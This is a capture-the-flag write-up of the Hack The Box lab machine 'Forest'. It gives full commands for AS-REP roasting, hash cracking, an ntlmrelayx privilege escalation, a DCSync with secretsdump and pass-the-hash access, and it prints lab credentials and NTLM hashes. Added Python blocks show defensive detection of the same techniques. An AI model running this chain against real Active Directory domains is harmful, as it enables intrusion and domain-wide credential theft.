Hackthebox.eu - Retired - Forest
Recon
As always I start with a simple up/down scan on all TCP ports to see what we can find.
nmap -T4 -p- -oX /root/Desktop/HTB/Forest/nmapb.xml 10.10.10.161
Then I convert that to HTML to make it pretty :)
xsltproc /root/Desktop/HTB/Forest/nmapb.xml -o /root/Desktop/HTB/Forest/nmapb.html
That's a whole lot of open ports.
Now let's do the next part of our staged scan. I'm going to scan just those ports with the -A switch to fingerprint the OS and services.
nmap -T4 -p 53,88,135,139,389,445,464,593,636,3268,3269,5985,9389,47001,49664,49665,49666,49667,49671,49676,49677,49684,49698,49717 -oX ./nmapf.xml -A 10.10.10.161
Then convert that to HTML too
xsltproc /root/Desktop/HTB/Forest/nmapf.xml -o /root/Desktop/HTB/Forest/nmapf.html
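The staged approach above (all-port up/down scan first, then -A only on what is open) needs the open-port list pulled out of the first XML. This added helper does that; it is not from the original write-up, and the XML below is a constructed stand-in for nmapb.xml.

```python
# Added example (not from the original write-up): turn the stage-one
# "up/down" nmap -oX output into the -p list for the stage-two -A scan.
import xml.etree.ElementTree as ET

# Constructed sample in nmap's XML layout (a few of the ports seen on the
# box), standing in for /root/Desktop/HTB/Forest/nmapb.xml.
SAMPLE_XML = """<nmaprun scanner="nmap">
  <host><status state="up"/>
    <address addr="10.10.10.161" addrtype="ipv4"/>
    <ports>
      <port protocol="tcp" portid="53"><state state="open"/></port>
      <port protocol="tcp" portid="88"><state state="open"/></port>
      <port protocol="tcp" portid="135"><state state="open"/></port>
      <port protocol="tcp" portid="445"><state state="open"/></port>
      <port protocol="tcp" portid="5985"><state state="open"/></port>
      <port protocol="tcp" portid="80"><state state="filtered"/></port>
      <port protocol="udp" portid="53"><state state="open"/></port>
    </ports>
  </host>
</nmaprun>"""


def open_ports(xml_text, proto="tcp"):
    """Sorted open ports of one protocol from nmap -oX output."""
    root = ET.fromstring(xml_text)
    found = set()
    for port in root.iter("port"):
        state = port.find("state")
        if (port.get("protocol") == proto and state is not None
                and state.get("state") == "open"):
            found.add(int(port.get("portid")))
    return sorted(found)


def port_arg(ports):
    """Format a port list as the value for nmap's -p switch."""
    return ",".join(str(p) for p in ports)


if __name__ == "__main__":
    ports = open_ports(SAMPLE_XML)
    print("nmap -T4 -A -p", port_arg(ports), "10.10.10.161")
```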
Looks like we have a Windows machine running AD services, WinRM and DNS.
Let's poke around and see what we can see. I also added forest.htb to my hosts file at this point.
Let's start with SMB.
Anonymous login worked, but no shares were available to it.
OK, can we get any info over RPC? I like to walk through this blog when doing this to refresh the commands.
# rpcclient -U "" -N 10.10.10.161
Some service accounts and some named users.
What about groups?
Let's check what the password policy is
We will use santi's user account for this
$> getusrdompwinfo 0x480
No complexity requirement and a minimum length of 7 characters.
OK, let's let enum4linux do some of the grunt work for us.
enum4linux -a forest.htb
We got some more info about the password policy from enum4linux.
The most interesting thing to me right now is that the lockout threshold is none, so accounts won't lock out if we try to brute force the passwords.
We found some more info about the users too
So the accounts we will probably focus on are andy, mark, santi, sebastien and svc-alfresco.
The svc-alfresco is especially interesting right now.
Here is some info on group memberships
So we can see svc-alfresco is a member of "Service Accounts", which is nested in "Privileged IT Accounts", so svc-alfresco is effectively a member of both groups.
I'm going to start with that svc-alfresco account as it seems like it might be over-privileged on this machine.
Exploit
OK, we have a list of users but no passwords. Let's try to rectify that.
ASREPRoast - This is an attack against Kerberos that targets accounts that don't require pre-authentication. For such an account the KDC answers an AS-REQ with an AS-REP (which carries a TGT) whose encrypted part we can take offline, crack, and so recover the password.
I created a file called forestusers.txt on my computer and put in all the usernames we found earlier in our enumeration.
We can feed this into an impacket tool called GetNPUsers.py; for any user set up not to require pre-authentication we should get a ticket back. Those tickets are saved locally to a file.
# python GetNPUsers.py htb/ -usersfile /root/Desktop/HTB/Forest/forestusers.txt -format hashcat -outputfile /root/Desktop/HTB/Forest/hashes -dc-ip 10.10.10.161
The output here is a little misleading. It only lists the users that have pre-authentication set, not those that don't. But if we check our output file...
We did capture a ticket for svc-alfresco
$krb5asrep$23$svc-alfresco@HTB:7f8610f480ea7b9156f4b5a27d259664$6ec39f9e2f8cdbed648caffafc38c6c784ca825a48f6b5112f6dd86689daa7eb45d8f5eb06b93d4f0cf2c42f2b8448bc3f434eecb2296f7866a783302ef30be8874089435e5701eb860221efe5f043c75308b946370c7675da35629368f9b2c9ae33c7ba5c1ce4c8e2c9e49ada72ea2fa41c16706f5fe97e7154a3ddf83d4a5efb8e8410edf0a3784bb9356b60b9a650c617c3355aac87e00690f5515512958e135c264c4bc635aca826ac744739fef58661da1f96db684c2a9d05c93b972ebdbc80a3b21fb01c72640abe85b7f3416211347f95283d35be03f855b90bb9373b
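The same event seen from the domain controller's side, as an added example that is not part of the original post: the roastable condition is the DONT_REQ_PREAUTH bit in userAccountControl, and the request GetNPUsers.py makes is logged as event 4768 with pre-authentication type 0 and RC4 (etype 23, hence the $23$ in the hash above). The user list and log records below are constructed for the demo.

```python
# Added example (not from the original write-up): what AS-REP roasting
# looks like from the DC side. A roastable account has DONT_REQ_PREAUTH
# (0x400000) set in userAccountControl, and the AS-REQ a tool such as
# GetNPUsers.py sends is logged as Security event 4768 with
# Pre-Authentication Type 0 and, for the $krb5asrep$23$ hash format above,
# ticket encryption type 0x17 (RC4-HMAC, etype 23).
DONT_REQ_PREAUTH = 0x400000
RC4_HMAC = 0x17


def roastable_accounts(users):
    """users: iterable of (sAMAccountName, userAccountControl) pairs."""
    return [name for name, uac in users if uac & DONT_REQ_PREAUTH]


def asrep_roast_events(events):
    """Return (user, source ip) for 4768 events matching the roast pattern.

    Status 0x0 matters: only a successful AS-REP hands out crackable material.
    """
    hits = []
    for ev in events:
        if (ev.get("EventID") == 4768 and ev.get("Status") == 0
                and ev.get("PreAuthType") == 0
                and ev.get("TicketEncryptionType") == RC4_HMAC):
            hits.append((ev["TargetUserName"], ev["IpAddress"]))
    return hits


# Constructed sample data (UAC values and events are made up for the demo;
# 0x10200 = NORMAL_ACCOUNT | DONT_EXPIRE_PASSWORD).
USERS = [("sebastien", 0x10200), ("svc-alfresco", 0x10200 | DONT_REQ_PREAUTH),
         ("andy", 0x10200)]
EVENTS = [
    {"EventID": 4768, "TargetUserName": "svc-alfresco", "IpAddress": "10.10.14.5",
     "PreAuthType": 0, "TicketEncryptionType": 0x17, "Status": 0},
    # Normal pre-authenticated AES request from a workstation.
    {"EventID": 4768, "TargetUserName": "andy", "IpAddress": "10.10.10.50",
     "PreAuthType": 2, "TicketEncryptionType": 0x12, "Status": 0},
    # Same scanner tried sebastien; KDC answered KDC_ERR_PREAUTH_REQUIRED.
    {"EventID": 4768, "TargetUserName": "sebastien", "IpAddress": "10.10.14.5",
     "PreAuthType": "-", "TicketEncryptionType": 0xFFFFFFFF, "Status": 0x19},
]

if __name__ == "__main__":
    print("roastable:", roastable_accounts(USERS))
    print("4768 hits:", asrep_roast_events(EVENTS))
```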
Now we can take our output and throw it in hashcat to break the hash
# hashcat -m 18200 -a 0 /root/Desktop/HTB/Forest/hashes /usr/share/wordlists/rockyou.txt --force
Here we see the password was found in rockyou.txt
s3rvice
Let's see if we can connect to SMB with that now.
# smbclient -L forest.htb -U HTB\\svc-alfresco
Sure can so we know our creds are good :)
Let's use WinRM to connect to the box.
# ruby rubywinRM
Cool, we are in. Let's get that user.txt hash.
PS > type user.txt
e5e***************************
What about priv escalation?
Have you heard of bloodhound?
It's a tool for analyzing AD environments, which can show all sorts of relationships that would take ages to suss out.
We are going to use it to take a look at the setup here
You can install it from the git repo.
I'm also going to use bloodhound-python and bloodhound-import (also on GitHub).
The first, bloodhound-python, is a tool we can use to collect the AD data from a remote machine.
The second, bloodhound-import, is a way to import that data into our BloodHound database.
First let's scan the environment with bloodhound-python
# bloodhound-python -d htb.local -u svc-alfresco -p s3rvice -gc forest.htb -c all -ns 10.10.10.161
This creates JSON files for computers and users as well as groups, sessions and domains.
I move them all to a folder called forest on my machine
Now we will use bloodhound-import to get them into our BloodHound DB.
# bloodhound-import -du circusmonkey404 -dp ********************* ./*.json
There are queries built into BloodHound; one is called "shortest path to High value targets".
Our output looks like this
And this little guy way down here is our user svc-alfresco
If we click on that account we get some more info on the account.
If we choose the "reachable high value targets"
We get this
We are a member of "Service Accounts", which we already discovered in our initial enumeration. We also saw that because of nesting we were a member of "Privileged IT Accounts", but that is all we saw.
Now we can see the nesting goes further. "Privileged IT Accounts" is a member of "Account Operators", which has a connection to "Exchange Windows Permissions", which has WriteDacl on the entire domain.
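The nesting just described is exactly what a token-membership audit has to resolve transitively, because enum4linux only showed one level. The following is an added example (not code from the post or from BloodHound) that walks a constructed edge list built from the relationships above; the Account Operators to Exchange Windows Permissions "connection" is modelled as an assumed "Controls" edge, since the post does not name the right.

```python
# Added example (not from the original write-up): resolve nested group
# membership the way BloodHound's "reachable high value targets" view does,
# and report any path from a principal to a right on the domain object.
# The edge list is constructed from the relationships described above; the
# Account Operators -> Exchange Windows Permissions "connection" is modelled
# as an assumed "Controls" edge because the post does not name the right.
from collections import deque

EDGES = [  # (source, relationship, target)
    ("svc-alfresco", "MemberOf", "Service Accounts"),
    ("Service Accounts", "MemberOf", "Privileged IT Accounts"),
    ("Privileged IT Accounts", "MemberOf", "Account Operators"),
    ("Account Operators", "Controls", "Exchange Windows Permissions"),  # assumed
    ("Exchange Windows Permissions", "WriteDacl", "HTB.LOCAL"),
    ("andy", "MemberOf", "Domain Users"),
]


def reachable(start, edges):
    """Breadth-first walk; maps each reached node to the (rel, node) path."""
    adj = {}
    for src, rel, dst in edges:
        adj.setdefault(src, []).append((rel, dst))
    paths, queue = {start: []}, deque([start])
    while queue:
        node = queue.popleft()
        for rel, nxt in adj.get(node, []):
            if nxt not in paths:
                paths[nxt] = paths[node] + [(rel, nxt)]
                queue.append(nxt)
    return paths


def effective_groups(principal, edges):
    """Transitive MemberOf closure: the groups the DC puts in the token."""
    member_only = [e for e in edges if e[1] == "MemberOf"]
    return sorted(n for n in reachable(principal, member_only) if n != principal)


def path_to_domain(principal, domain, edges):
    """Edge-by-edge path to the domain object, or None if unreachable."""
    paths = reachable(principal, edges)
    if domain not in paths:
        return None
    return [f"{rel} -> {node}" for rel, node in paths[domain]]


if __name__ == "__main__":
    print(effective_groups("svc-alfresco", EDGES))
    print(path_to_domain("svc-alfresco", "HTB.LOCAL", EDGES))
```

Running the audit over every account in the domain and alerting on any non-None path is the defensive use: it surfaces the same chain before someone else does.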
Here is a nice write up about how we can leverage this to get Domain Admin privileges.
We'll follow this blog to privilege escalation.
First let's add our account to the group mentioned in the post.
Import-Module ActiveDirectory
Add-ADGroupMember "Exchange Windows Permissions" svc-alfresco
Now we can skip the privexchange.py part because there is no Exchange server on the LAN to authenticate against.
So now we run
/opt/impacket-master/examples# ./ntlmrelayx.py -t ldap://forest.htb.local --escalate-user svc-alfresco
Then pull up a web browser and hit our loopback address.
Here we are prompted to authenticate, so we use svc-alfresco and s3rvice.
Checking back on ntlmrelayx.py we get this:
We successfully authenticated against the DC and it escalated our user to have replication rights.
So pop over to secretsdump.py
/opt/impacket-master/examples# ./secretsdump.py htb/svc-alfresco@10.10.10.161
And we get hashes!!!!!
I found on this previous step you really have to act fast. I was up against this for a couple of days before I got the sequence right.
[*] Using the DRSUAPI method to get NTDS.DIT secrets
htb.local\Administrator:500:aad3b435b51404eeaad3b435b51404ee:32693b11e6aa90eb43d32c72a07ceea6:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:819af826bb148e603acb0f33d17632f8:::
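The DRSUAPI pull that secretsdump.py just performed is a DCSync, and on a DC with directory service access auditing enabled it leaves event 4662 on the domain object carrying the two replication control-access rights. The detection below is an added example, not part of the original post; the log records are constructed, and the DC machine account name FOREST$ used for the allowlist is an assumption for the demo.

```python
# Added example (not from the original write-up): the DRSUAPI pull that
# secretsdump.py performs above is a DCSync. With directory service access
# auditing on, the DC logs it as Security event 4662 on the domain object,
# with the replication control-access rights in the Properties field.
DS_REPL_GET_CHANGES = "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2"
DS_REPL_GET_CHANGES_ALL = "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2"
REPL_GUIDS = {DS_REPL_GET_CHANGES, DS_REPL_GET_CHANGES_ALL}


def is_dcsync(event, dc_accounts):
    """True when a principal outside dc_accounts exercised a replication right."""
    if event.get("EventID") != 4662:
        return False
    props = {p.lower() for p in event.get("Properties", [])}
    if not props & REPL_GUIDS:
        return False
    # DCs replicate with each other all day; only non-DC subjects are news.
    return event.get("SubjectUserName", "").upper() not in dc_accounts


def dcsync_alerts(events, dc_accounts=frozenset({"FOREST$"})):
    """(subject, object) for every DCSync-looking event.

    The DC machine account name is an assumption for this example; in a real
    deployment build the allowlist from the Domain Controllers OU.
    """
    return [(e["SubjectUserName"], e["ObjectName"])
            for e in events if is_dcsync(e, dc_accounts)]


# Constructed sample events (not real logs).
EVENTS = [
    {"EventID": 4662, "SubjectUserName": "svc-alfresco",
     "ObjectName": "DC=htb,DC=local", "AccessMask": 0x100,
     "Properties": [DS_REPL_GET_CHANGES, DS_REPL_GET_CHANGES_ALL]},
    {"EventID": 4662, "SubjectUserName": "FOREST$",  # routine DC-to-DC replication
     "ObjectName": "DC=htb,DC=local", "AccessMask": 0x100,
     "Properties": [DS_REPL_GET_CHANGES_ALL]},
    {"EventID": 4662, "SubjectUserName": "svc-alfresco",  # ordinary attribute read
     "ObjectName": "CN=andy,CN=Users,DC=htb,DC=local", "AccessMask": 0x10,
     "Properties": ["deadbeef-0000-0000-0000-000000000000"]},  # placeholder GUID
]

if __name__ == "__main__":
    print(dcsync_alerts(EVENTS))
```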
Now we could spend some time cracking this hash to see what the password is or….
We can just pass the hash
Using wmiexec.py from impacket can get us where we need to be.
# ./wmiexec.py -hashes aad3b435b51404eeaad3b435b51404ee:32693b11e6aa90eb43d32c72a07ceea6 administrator@10.10.10.161
And a quick whoami
We are administrator
Let's get that hash